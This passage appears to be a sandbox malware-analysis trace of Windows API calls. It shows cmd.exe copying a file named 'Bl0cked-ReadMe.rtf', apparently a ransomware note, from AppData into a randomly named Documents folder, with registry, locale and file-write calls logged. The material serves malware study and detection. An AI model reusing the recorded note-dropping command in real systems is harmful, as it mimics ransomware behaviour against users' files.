"\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35515 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35516 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 35517 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 35518 
start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 35519 start_va = 0x510000 end_va = 0x610fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 35520 start_va = 0x620000 end_va = 0x121ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000620000" filename = "" Region: id = 35521 start_va = 0x1220000 end_va = 0x1382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001220000" filename = "" Thread: id = 873 os_tid = 0xde4 [0235.204] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fb94 | out: lpSystemTimeAsFileTime=0x22fb94*(dwLowDateTime=0xbfa75420, dwHighDateTime=0x1d440a9)) [0235.204] GetCurrentProcessId () returned 0xdec [0235.204] GetCurrentThreadId () returned 0xde4 [0235.204] GetTickCount () returned 0x40943 [0235.204] QueryPerformanceCounter (in: lpPerformanceCount=0x22fb8c | out: lpPerformanceCount=0x22fb8c*=29199325969) returned 1 [0235.205] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0235.205] __set_app_type (_Type=0x1) [0235.205] __p__fmode () returned 0x76b331f4 [0235.205] __p__commode () returned 0x76b331fc [0235.205] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0235.205] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0235.205] GetCurrentThreadId () returned 0xde4 [0235.205] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xde4) returned 0x38 [0235.205] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.205] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0235.205] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.205] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, 
HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0235.205] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fb24 | out: phkResult=0x22fb24*=0x0) returned 0x2 [0235.205] VirtualQuery (in: lpAddress=0x22fb5b, lpBuffer=0x22faf4, dwLength=0x1c | out: lpBuffer=0x22faf4*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.205] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22faf4, dwLength=0x1c | out: lpBuffer=0x22faf4*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0235.206] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22faf4, dwLength=0x1c | out: lpBuffer=0x22faf4*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0235.206] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22faf4, dwLength=0x1c | out: lpBuffer=0x22faf4*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0235.206] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22faf4, dwLength=0x1c | out: lpBuffer=0x22faf4*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0235.206] GetConsoleOutputCP () returned 0x1b5 [0235.206] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.206] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0235.206] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.206] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0235.206] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.206] GetConsoleMode (in: hConsoleHandle=0x7, 
lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.206] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.206] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.206] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.206] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.206] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.207] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0235.207] GetEnvironmentStringsW () returned 0x420198* [0235.207] FreeEnvironmentStringsW (penv=0x420198) returned 1 [0235.207] GetEnvironmentStringsW () returned 0x420198* [0235.207] FreeEnvironmentStringsW (penv=0x420198) returned 1 [0235.207] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ea94 | out: phkResult=0x22ea94*=0x40) returned 0x0 [0235.207] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x0, lpData=0x22eaa0*=0xc0, lpcbData=0x22ea98*=0x1000) returned 0x2 [0235.207] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x4, lpData=0x22eaa0*=0x1, lpcbData=0x22ea98*=0x4) returned 0x0 [0235.207] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x0, lpData=0x22eaa0*=0x1, lpcbData=0x22ea98*=0x1000) returned 0x2 [0235.207] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x4, lpData=0x22eaa0*=0x0, lpcbData=0x22ea98*=0x4) returned 0x0 [0235.207] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, 
lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x4, lpData=0x22eaa0*=0x40, lpcbData=0x22ea98*=0x4) returned 0x0 [0235.207] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x4, lpData=0x22eaa0*=0x40, lpcbData=0x22ea98*=0x4) returned 0x0 [0235.207] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x0, lpData=0x22eaa0*=0x40, lpcbData=0x22ea98*=0x1000) returned 0x2 [0235.207] RegCloseKey (hKey=0x40) returned 0x0 [0235.207] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ea94 | out: phkResult=0x22ea94*=0x40) returned 0x0 [0235.207] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x0, lpData=0x22eaa0*=0x40, lpcbData=0x22ea98*=0x1000) returned 0x2 [0235.207] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x4, lpData=0x22eaa0*=0x1, lpcbData=0x22ea98*=0x4) returned 0x0 [0235.207] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x0, lpData=0x22eaa0*=0x1, lpcbData=0x22ea98*=0x1000) returned 0x2 [0235.208] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x4, lpData=0x22eaa0*=0x0, lpcbData=0x22ea98*=0x4) returned 0x0 [0235.208] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x4, 
lpData=0x22eaa0*=0x9, lpcbData=0x22ea98*=0x4) returned 0x0 [0235.208] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x4, lpData=0x22eaa0*=0x9, lpcbData=0x22ea98*=0x4) returned 0x0 [0235.208] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ea9c, lpData=0x22eaa0, lpcbData=0x22ea98*=0x1000 | out: lpType=0x22ea9c*=0x0, lpData=0x22eaa0*=0x9, lpcbData=0x22ea98*=0x1000) returned 0x2 [0235.208] RegCloseKey (hKey=0x40) returned 0x0 [0235.208] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0235.208] srand (_Seed=0x5b8863c2) [0235.208] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" [0235.208] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"" [0235.208] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.208] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4218f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0235.208] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0235.208] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0235.208] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.208] _wcsicmp 
(_String1="PROMPT", _String2="CD") returned 13 [0235.208] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0235.208] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0235.208] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0235.209] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0235.209] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0235.209] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0235.209] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0235.209] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0235.209] GetEnvironmentStringsW () returned 0x4222e8* [0235.209] FreeEnvironmentStringsW (penv=0x4222e8) returned 1 [0235.209] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.209] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0235.209] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0235.209] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0235.209] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0235.209] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0235.209] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0235.209] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0235.209] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0235.209] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0235.209] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f860 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.209] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f860, lpFilePart=0x22f85c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f85c*="Desktop") returned 0x18 [0235.209] 
GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.209] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f5dc | out: lpFindFileData=0x22f5dc) returned 0x420028 [0235.209] FindClose (in: hFindFile=0x420028 | out: hFindFile=0x420028) returned 1 [0235.210] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f5dc | out: lpFindFileData=0x22f5dc) returned 0x420028 [0235.210] FindClose (in: hFindFile=0x420028 | out: hFindFile=0x420028) returned 1 [0235.210] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f5dc | out: lpFindFileData=0x22f5dc) returned 0x420028 [0235.210] FindClose (in: hFindFile=0x420028 | out: hFindFile=0x420028) returned 1 [0235.210] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0235.210] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0235.210] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0235.210] GetEnvironmentStringsW () returned 0x422b08* [0235.210] FreeEnvironmentStringsW (penv=0x422b08) returned 1 [0235.210] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.211] GetConsoleOutputCP () returned 0x1b5 [0235.211] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.211] GetUserDefaultLCID () returned 0x409 [0235.211] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0235.211] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f9a0, cchData=128 | out: lpLCData="0") returned 2 [0235.211] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f9a0, cchData=128 | out: lpLCData="0") returned 2 [0235.211] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x24, lpLCData=0x22f9a0, cchData=128 | out: lpLCData="1") returned 2 [0235.211] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fd4940, cchData=8 | out: lpLCData="/") returned 2 [0235.211] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fd4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0235.211] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fd4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0235.211] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fd4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0235.211] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fd4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0235.212] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fd4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0235.212] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fd4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0235.212] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fd4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0235.212] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fd4930, cchData=8 | out: lpLCData=".") returned 2 [0235.212] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fd4920, cchData=8 | out: lpLCData=",") returned 2 [0235.212] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0235.212] GetConsoleTitleW (in: lpConsoleTitle=0x4108f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.213] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0235.213] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0235.213] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0235.213] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0235.213] _wcsicmp (_String1="type", _String2=")") returned 75 [0235.213] 
_wcsicmp (_String1="FOR", _String2="type") returned -14 [0235.213] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0235.213] _wcsicmp (_String1="IF", _String2="type") returned -11 [0235.213] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0235.214] _wcsicmp (_String1="REM", _String2="type") returned -2 [0235.214] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0235.217] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.217] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.217] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.217] GetFileType (hFile=0x7) returned 0x2 [0235.388] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0235.388] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x22f898 | out: lpMode=0x22f898) returned 1 [0235.388] _dup (_FileHandle=1) returned 3 [0235.388] _close (_FileHandle=1) returned 0 [0235.388] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0235.388] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\xj2fmd\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x22f868, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0235.389] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0235.389] GetConsoleTitleW (in: lpConsoleTitle=0x22f698, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0235.389] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0235.389] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0235.389] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0235.389] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0235.390] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0235.390] FindFirstFileExW (in: 
lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x22f1fc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22f1fc) returned 0x410e90 [0235.390] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0235.390] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0235.390] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0235.390] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x22e108, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0235.390] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0235.390] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.390] GetFileType (hFile=0x54) returned 0x1 [0235.390] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.390] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x22e160 | out: lpFileSizeHigh=0x22e160*=0x0) returned 0x1632 [0235.390] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.390] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0235.391] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.391] ReadFile (in: hFile=0x54, lpBuffer=0x22ef98, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e188, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesRead=0x22e188*=0x200, lpOverlapped=0x0) returned 1 [0235.391] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.391] GetFileType (hFile=0x4c) returned 0x1 [0235.391] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.391] GetFileType (hFile=0x4c) returned 0x1 [0235.391] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.391] WriteFile (in: 
hFile=0x4c, lpBuffer=0x22ef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.392] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.392] GetFileType (hFile=0x4c) returned 0x1 [0235.392] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.392] WriteFile (in: hFile=0x4c, lpBuffer=0x22efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22efe8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.392] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.392] GetFileType (hFile=0x4c) returned 0x1 [0235.392] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.392] WriteFile (in: hFile=0x4c, lpBuffer=0x22f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f038*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.392] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.392] GetFileType (hFile=0x4c) returned 0x1 [0235.392] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.392] WriteFile (in: hFile=0x4c, lpBuffer=0x22f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f088*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.392] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.392] GetFileType (hFile=0x4c) returned 0x1 [0235.392] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.392] WriteFile (in: hFile=0x4c, lpBuffer=0x22f0d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f0d8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.392] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.392] GetFileType (hFile=0x4c) returned 0x1 [0235.392] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.392] WriteFile (in: hFile=0x4c, lpBuffer=0x22f128*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f128*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.392] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.392] GetFileType (hFile=0x4c) returned 0x1 [0235.393] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.393] WriteFile (in: hFile=0x4c, lpBuffer=0x22f178*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f178*, lpNumberOfBytesWritten=0x22e17c*=0x20, lpOverlapped=0x0) returned 1 [0235.393] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.393] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22e168 | out: lpNewFilePointer=0x0) returned 1 [0235.393] _get_osfhandle (_FileHandle=4) returned 0x54 [0235.393] ReadFile (in: hFile=0x54, lpBuffer=0x22ef98, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22e188, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesRead=0x22e188*=0x200, lpOverlapped=0x0) returned 1 [0235.393] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.393] GetFileType (hFile=0x4c) returned 0x1 [0235.393] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.393] GetFileType (hFile=0x4c) returned 0x1 [0235.393] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.393] WriteFile (in: hFile=0x4c, lpBuffer=0x22ef98*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22ef98*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.393] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.393] GetFileType (hFile=0x4c) returned 0x1 [0235.393] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.393] WriteFile (in: hFile=0x4c, lpBuffer=0x22efe8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22efe8*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.393] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0235.393] GetFileType (hFile=0x4c) returned 0x1 [0235.393] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.393] WriteFile (in: hFile=0x4c, lpBuffer=0x22f038*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f038*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.393] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.393] GetFileType (hFile=0x4c) returned 0x1 [0235.393] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.393] WriteFile (in: hFile=0x4c, lpBuffer=0x22f088*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22e17c, lpOverlapped=0x0 | out: lpBuffer=0x22f088*, lpNumberOfBytesWritten=0x22e17c*=0x50, lpOverlapped=0x0) returned 1 [0235.393] _get_osfhandle (_FileHandle=1) returned 0x4c [0235.393] GetFileType 